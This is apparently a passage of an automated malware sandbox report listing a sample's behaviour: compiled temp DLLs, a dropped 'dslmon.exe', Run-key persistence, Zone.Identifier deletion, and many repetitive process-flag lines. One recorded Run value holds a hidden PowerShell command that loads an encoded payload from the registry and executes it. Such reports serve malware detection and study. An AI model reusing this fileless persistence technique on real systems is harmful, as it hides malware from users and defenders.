Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0815D989 pushad ; retf 19_2_0815D995
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081B2B17 push eax; mov dword ptr [esp], edx 19_2_081B2B2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BCBF0 push es; ret 19_2_081BCC00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845214C pushad ; ret 19_2_0845214D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08562B60 push eax; iretd 19_2_08562B61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08560FC8 pushad ; ret 19_2_08560FC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089A78E8 push eax; mov dword ptr [esp], edx 19_2_089A78FC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089ACDF0 push eax; mov dword ptr [esp], edx 19_2_089ACE04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B470E3 pushad ; ret 25_2_02B470F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B43F60 push es; ret 25_2_02B43F70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079603ED push eax; mov dword ptr [esp], edx 25_2_0796044C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08174350 pushfd ; iretd 25_2_08174351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08171FB0 push esp; ret 25_2_08171FB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_081737E0 push esp; retf 25_2_081737E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08185F40 push eax; mov dword ptr [esp], edx 25_2_08185F6C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03283730 pushad ; iretd 28_2_03283731
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_03280A86 push FFFFFF8Bh; retf 28_2_03280A8F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_0840EB1F pushfd ; ret 28_2_0840EB21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_08616FDA push esp; ret 28_2_08616FE9
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kxeayl3s.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kxeayl3s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3rumnuxb.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kar5iszo.dll Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel Jump to behavior
Creates multiple autostart registry keys
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DSL Monitor Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel cmd /c start /b c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor) Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Avel Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DSL Monitor Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DSL Monitor Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
